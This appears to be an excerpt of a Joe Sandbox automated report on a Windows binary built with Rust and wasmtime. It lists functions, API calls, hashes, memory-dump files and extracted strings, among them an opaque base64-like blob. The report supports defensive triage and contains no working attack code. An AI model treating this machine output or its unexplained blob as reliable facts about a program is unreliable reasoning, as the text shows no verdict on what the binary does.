Opcode ID: bc820dc7ce6c6d6bac0bc013c8b2f60a10f29b9faf5839f2e17076aff7fbd0a5
Instruction ID: 6435ba1accae06095011b31b9d7254c8d30408cc038cec8703ac6129a06c6ab3
Opcode Fuzzy Hash: bc820dc7ce6c6d6bac0bc013c8b2f60a10f29b9faf5839f2e17076aff7fbd0a5
Instruction Fuzzy Hash: 99438F32A08BC2C2EA60DB55E4443EA73B4FBA5784F404136EA8D9BB99DF3CE555C704

Function 00007FF66DFA1180 Relevance: 10.6, APIs: 7, Instructions: 138
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(?,?,?,00007FF66DFA13E6), ref: 00007FF66DFA11BE
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF66DFA122F
malloc.MSVCRT ref: 00007FF66DFA1263
strlen.MSVCRT ref: 00007FF66DFA1284
malloc.MSVCRT ref: 00007FF66DFA1290
memcpy.MSVCRT ref: 00007FF66DFA12A8

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: malloc$ExceptionFilterSleepUnhandledmemcpystrlen
String ID:
API String ID: 3806033187-0
Opcode ID: c8bd3e23893c37efd771a59b602fedc20bf07a7cd1760fed2cd31d1802a29d83
Instruction ID: 86bfddc646b3f970799d27f0ea7e2cca82d26df0ea21a07a1e76eda093d33f7f
Opcode Fuzzy Hash: c8bd3e23893c37efd771a59b602fedc20bf07a7cd1760fed2cd31d1802a29d83
Instruction Fuzzy Hash: 3D514935E09A03C6F6509F66E99467933B6AFA5B84F094031EA0DCF791EE3CE8458318

Function 00007FF66E035AA5 Relevance: 10.0, APIs: 2, Strings: 3, Instructions: 2515COMMON

Download Yara Rule

Strings

capacity overflow, xrefs: 00007FF66E039314
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E039387
generation_by_depth cannot be empty, xrefs: 00007FF66E039353

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpymemset
String ID: called `Result::unwrap()` on an `Err` value$capacity overflow$generation_by_depth cannot be empty
API String ID: 1297977491-3596424090
Opcode ID: ec8d08c87645dc23196c0e250af53478cc0c3239d4703ad6a7d0e5ee25660c61
Instruction ID: 26d2df9433056c338678952dd3db48af78d1356a73e730f7b6249ff113ae8672
Opcode Fuzzy Hash: ec8d08c87645dc23196c0e250af53478cc0c3239d4703ad6a7d0e5ee25660c61
Instruction Fuzzy Hash: 49437F72A08AC6C1EA70DB15E4407EAB371FBA4B80F444136EA8D9BB99DF3CD955C704

Function 00007FF66E273C99 Relevance: 8.1, APIs: 1, Strings: 3, Instructions: 2059COMMON

Download Yara Rule

Strings

assertion failed: self.exports.names.is_empty(), xrefs: 00007FF66E2769A8, 00007FF66E2769F0, 00007FF66E276A6D, 00007FF66E276A7D
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E276953, 00007FF66E276B06, 00007FF66E276B2C
nameproducersmetadata.code.branch_hint, xrefs: 00007FF66E27664D

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: assertion failed: self.exports.names.is_empty()$called `Result::unwrap()` on an `Err` value$nameproducersmetadata.code.branch_hint
API String ID: 0-3030008011
Opcode ID: 5922fefb73896d5295be0795b68add2161260c2e08459d31855a6860ce5f2f4e
Instruction ID: 26b6dfc5fe9cc10e3341a78a84291567be71be10814a948a33791093cdf385a7
Opcode Fuzzy Hash: 5922fefb73896d5295be0795b68add2161260c2e08459d31855a6860ce5f2f4e
Instruction Fuzzy Hash: 18237E72A18BC5C2EA60DB11E1413EAB375FB95B84F444136EA9D8BB89CF3CE145CB44

Function 00007FF66E0887FC Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 492
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 00007FF66E088A3C
memcpy.MSVCRT ref: 00007FF66E088D5C

Part of subcall function 00007FF66E08ECF1: memcpy.MSVCRT ref: 00007FF66E08EE10

memcpy.MSVCRT ref: 00007FF66E088F2C

Strings

q, xrefs: 00007FF66E088F62
q, xrefs: 00007FF66E088A5D

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: q$q
API String ID: 3510742995-2090367865
Opcode ID: 9e9a31d66abafd135a5721e7c9eca3adbbc9fa6ee38985cf4b982066724fa9c2
Instruction ID: 4a632c52111e6a732d1d7261266cad9b18f837abd7f6a156b155936a270af708
Opcode Fuzzy Hash: 9e9a31d66abafd135a5721e7c9eca3adbbc9fa6ee38985cf4b982066724fa9c2
Instruction Fuzzy Hash: F3327B72608BC5D1EA60DB11E4443EAB375FB94B84F848236EA8D8BB99DF3CD155CB04

Function 00007FF66DFA1BD9 Relevance: 7.8, Strings: 6, Instructions: 265COMMON

Download Yara Rule

Strings

modnarod, xrefs: 00007FF66DFA1D3F
setybdet, xrefs: 00007FF66DFA1D59
pteD/wX+Gd+e9jRL8fz36BljbaFo98qbLASNGx7I1qlzPPlZeww2OqqF94URMSyD2BmjO932Sj6eaMfUy9JUgFqH75hsDU9vrxKvXtM+lUK+rqf9VwDKsSSrKWW2iMMjCvCBKSYnn7gxLpE2G0zNhdMbITs4o/Tpe/nTysaDR05e89k9L0kwSltLZ4xQIJXoVvP0mWn22tkLB/6KQI3Ja+ICkDfZiVdQWVsn+rSLX7TJ931pm57G08wuDfqtCNEApSJx, xrefs: 00007FF66DFA23A8
arenegyl, xrefs: 00007FF66DFA1D4C
unable to convert from a shared memory, xrefs: 00007FF66DFA235D
uespemos, xrefs: 00007FF66DFA1D32

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: arenegyl$modnarod$pteD/wX+Gd+e9jRL8fz36BljbaFo98qbLASNGx7I1qlzPPlZeww2OqqF94URMSyD2BmjO932Sj6eaMfUy9JUgFqH75hsDU9vrxKvXtM+lUK+rqf9VwDKsSSrKWW2iMMjCvCBKSYnn7gxLpE2G0zNhdMbITs4o/Tpe/nTysaDR05e89k9L0kwSltLZ4xQIJXoVvP0mWn22tkLB/6KQI3Ja+ICkDfZiVdQWVsn+rSLX7TJ931pm57G08wuDfqtCNEApSJx$setybdet$uespemos$unable to convert from a shared memory
API String ID: 0-700421367
Opcode ID: 57bb879ba97aaa42aeb7a2c3249d08a18e84a97c5698cef6edf2927878570d0c
Instruction ID: 9ae16a707a561e6c6b95529d0df6d0336c274b6c4648a4e40894c53804641090
Opcode Fuzzy Hash: 57bb879ba97aaa42aeb7a2c3249d08a18e84a97c5698cef6edf2927878570d0c
Instruction Fuzzy Hash: 83C1B472B19B86C2EA60DB16E4002EAB3B5FB95B84F445136EE8D9B755EF3CE541C300

Function 00007FF66E0C8F00 Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 160
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00007FF66E0CB97D: memcpy.MSVCRT ref: 00007FF66E0CB9B5

memcpy.MSVCRT ref: 00007FF66E0C9198

Strings

modnarod, xrefs: 00007FF66E0C8FDC
setybdet, xrefs: 00007FF66E0C8FEE
arenegyl, xrefs: 00007FF66E0C8FCA
uespemos, xrefs: 00007FF66E0C8FB8

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: arenegyl$modnarod$setybdet$uespemos
API String ID: 3510742995-66988881
Opcode ID: c1e5eb01764c3431324badec47370c1ce8461ccae6f591e3c713980d0d351a4b
Instruction ID: d243916b110f4b1884a099012d690fa74fa201f19956fdf726fbf52a31fb5965
Opcode Fuzzy Hash: c1e5eb01764c3431324badec47370c1ce8461ccae6f591e3c713980d0d351a4b
Instruction Fuzzy Hash: 8961C372B09BC481EAA1CB25B9153EAB365FB987D8F409121DECC47B59DF38D195C700

Function 00007FF66DFA6B89 Relevance: 4.1, Strings: 3, Instructions: 387COMMON

Download Yara Rule

Strings

a), xrefs: 00007FF66DFA7994
Q'", xrefs: 00007FF66DFAA8B4
r-, xrefs: 00007FF66DFA7C90

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: Q'"$a)$r-
API String ID: 0-605250197
Opcode ID: 2efe0658367b3e209ce1d09915ef8c300225c6188c86cb7cbb306fbd8ce39e5d
Instruction ID: e58bb80b104c5f79c390904fbb853914f10374d32748e95df898d97eedcdd957
Opcode Fuzzy Hash: 2efe0658367b3e209ce1d09915ef8c300225c6188c86cb7cbb306fbd8ce39e5d
Instruction Fuzzy Hash: 06322832A0CBC1C1E2318B15E4453EAB3B4FBA9788F466225DFDC57A59EF38D5918B00

Function 00007FF66E205718 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 00007FF66E205731

Strings

assertion failed: size != 0/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-runtime-17.0.3/src/lib.rs, xrefs: 00007FF66E20574B

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: InfoSystem
String ID: assertion failed: size != 0/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-runtime-17.0.3/src/lib.rs
API String ID: 31276548-2560985841
Opcode ID: 465aeef1801c49e9d73fd4a592853909ecd2db4c2698b26686bbe42ce45a4176
Instruction ID: 80a75d04f5105b137244209d9685e9eb1753f24a9581b0c249a55b8f87baef91
Opcode Fuzzy Hash: 465aeef1801c49e9d73fd4a592853909ecd2db4c2698b26686bbe42ce45a4176
Instruction Fuzzy Hash: 71116532A09B4AD2EB40DF25F5412A833B4FB65B44F604136EA4C9B350DF7CE55AC744

Function 00007FF66DFA57A2 Relevance: 16.8, APIs: 2, Strings: 9, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF66E1801F7: memcpy.MSVCRT ref: 00007FF66E180270

Part of subcall function 00007FF66E103740: memcpy.MSVCRT ref: 00007FF66E103792

memcpy.MSVCRT ref: 00007FF66DFA5C17
memcpy.MSVCRT ref: 00007FF66DFA5C6A

Strings

modules/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-cache-17.0.3/src/lib.rsmod, xrefs: 00007FF66DFA5840
Cache system should be enabled and all settings must be validated or defaulted/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-cache-17.0.3/src/config.rs, xrefs: 00007FF66DFAAC4A
g], xrefs: 00007FF66DFAADA4
assertion failed: !ptr.is_null()/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-runtime-17.0.3/src/instance.rs, xrefs: 00007FF66DFAACDA
B^, xrefs: 00007FF66DFAACC9
assertion failed: edge.height == self.node.height - 1, xrefs: 00007FF66DFAAD29
assertion failed: idx < CAPACITY/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\alloc\src\collections\btree\node.rs, xrefs: 00007FF66DFAAE47
assertion failed: self.element_type() == TableElementType::Func, xrefs: 00007FF66DFAACB6
wasmtimewasm-function[, xrefs: 00007FF66DFA57A7

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: memcpy
String ID: Cache system should be enabled and all settings must be validated or defaulted/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-cache-17.0.3/src/config.rs$assertion failed: !ptr.is_null()/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-runtime-17.0.3/src/instance.rs$assertion failed: edge.height == self.node.height - 1$assertion failed: idx < CAPACITY/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\alloc\src\collections\btree\node.rs$assertion failed: self.element_type() == TableElementType::Func$modules/user/momo/.cargo/registry/src/index.crates.io-6f17d22bba15001f/wasmtime-cache-17.0.3/src/lib.rsmod$wasmtimewasm-function[$B^$g]
API String ID: 3510742995-3245745188
Opcode ID: 745f5f4e7382043f6cb8bcd374fab8cb3726d7e97be40ea9694eb5e7c0e43dd3
Instruction ID: cfcd711c8c656cccbf63c20444e9005f48ecb9cc8d053f3728c4e75a03a92631
Opcode Fuzzy Hash: 745f5f4e7382043f6cb8bcd374fab8cb3726d7e97be40ea9694eb5e7c0e43dd3
Instruction Fuzzy Hash: BEF15C32A18BC6C1EA60DB11E4503FAB371FB94784F848032EA8D9BA95DF7DE549C744

Function 00007FF66DFA289D Relevance: 9.4, APIs: 2, Strings: 4, Instructions: 374
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

enable_verifierenable_pccregalloc_checkerregalloc_verbose_logsis_picbb_padding_log2_minus_onemachine_code_cfg_infotls_modelopt_levelenable_alias_analysisprobestack_func_adjusts_spprobestack_size_log2regallocenable_incremental_compilation_cache_checksenable_ato, xrefs: 00007FF66DFA2C4F
false, xrefs: 00007FF66DFA2C6C
Q'", xrefs: 00007FF66DFAA8B4
WASMTIME_BACKTRACE_DETAILSspeedfeature 'reference_types' requires 'bulk_memory' to be enabled, xrefs: 00007FF66DFA2D12

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: WASMTIME_BACKTRACE_DETAILSspeedfeature 'reference_types' requires 'bulk_memory' to be enabled$enable_verifierenable_pccregalloc_checkerregalloc_verbose_logsis_picbb_padding_log2_minus_onemachine_code_cfg_infotls_modelopt_levelenable_alias_analysisprobestack_func_adjusts_spprobestack_size_log2regallocenable_incremental_compilation_cache_checksenable_ato$false$Q'"
API String ID: 0-214950099
Opcode ID: 7f5edfe1f35f97f3caf54b55cc8d5f822bed24e5e71e75720c789134252d52ea
Instruction ID: 562b3671430948adcf327dce6e14b77ca305a161e51cede1bad82a9ede58f21a
Opcode Fuzzy Hash: 7f5edfe1f35f97f3caf54b55cc8d5f822bed24e5e71e75720c789134252d52ea
Instruction Fuzzy Hash: 74124832A08BC5C2E6648B25E4503EAB7B4F799B84F048225DBDD5BB99DF7CE185C700

Function 00007FF66E0DE420 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs, xrefs: 00007FF66E0DE469
use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 00007FF66E0DE705, 00007FF66E0DE71D
assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs, xrefs: 00007FF66E0DE766
called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E0DE495

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID: Value
String ID: assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs$called `Result::unwrap()` on an `Err` value$cannot access a Thread Local Storage value during or after destruction/rustc/129f3b9964af4d4a709d1383930ade12dfe7c081\library\std\src\thread\local.rs$use of std::thread::current() is not possible after the thread's local data has been destroyed
API String ID: 3702945584-2484187703
Opcode ID: b1966bcdf5d059be08767728971f86487fc78eddc5a70415fe123b83355a033d
Instruction ID: 418bea9dc28f0be3bb72e272b52985a2aa48198d4c790456cffa9b4611a2f3b5
Opcode Fuzzy Hash: b1966bcdf5d059be08767728971f86487fc78eddc5a70415fe123b83355a033d
Instruction Fuzzy Hash: 9091B02AE09A47C4FB519B61D8403BE6774EF64798F584432EE0D8B7D5DE3CA462C348

Function 00007FF66E05557E Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 224
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

called `Result::unwrap()` on an `Err` value, xrefs: 00007FF66E055877
assertion failed: !self.inst_sunk.contains(&inst), xrefs: 00007FF66E05563C

Memory Dump Source

Source File: 00000000.00000002.3256172113.00007FF66DFA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF66DFA0000, based on PE: true

Associated: 00000000.00000002.3256154174.00007FF66DFA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256350291.00007FF66E2D7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256368709.00007FF66E2D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256471133.00007FF66E490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256488232.00007FF66E491000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256504955.00007FF66E492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256520870.00007FF66E493000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3256537369.00007FF66E496000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff66dfa0000_Z9fvmHepQC.jbxd

Similarity

API ID:
String ID: assertion failed: !self.inst_sunk.contains(&inst)$called `Result::unwrap()` on an `Err` value
API String ID: 0-3366224540
Opcode ID: 6384a2d18beafd6e0f511aa13d352ae6e2ac96441adbe4d61c2e75b745ff56f3
Instruction ID: c4f5436fe033b7dd1e7238e42eaa117f38afd1e7c031db2bd40994a3317fa332
Opcode Fuzzy Hash: 6384a2d18beafd6e0f511aa13d352ae6e2ac96441adbe4d61c2e75b745ff56f3
Instruction Fuzzy Hash: 3F91C376B08A46C2EA109F12E5403BA67B1FB94BC4F848432EE4E9B795DF3CE195C704

Function 00007FF66E106720 Relevance: 6.1, APIs: 4, Instructions: 74
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66E106718), ref: 00007FF66E10673B
TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66E106718), ref: 00007FF66E106761
TlsSetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF66E106718), ref: 00007FF66E1067B4
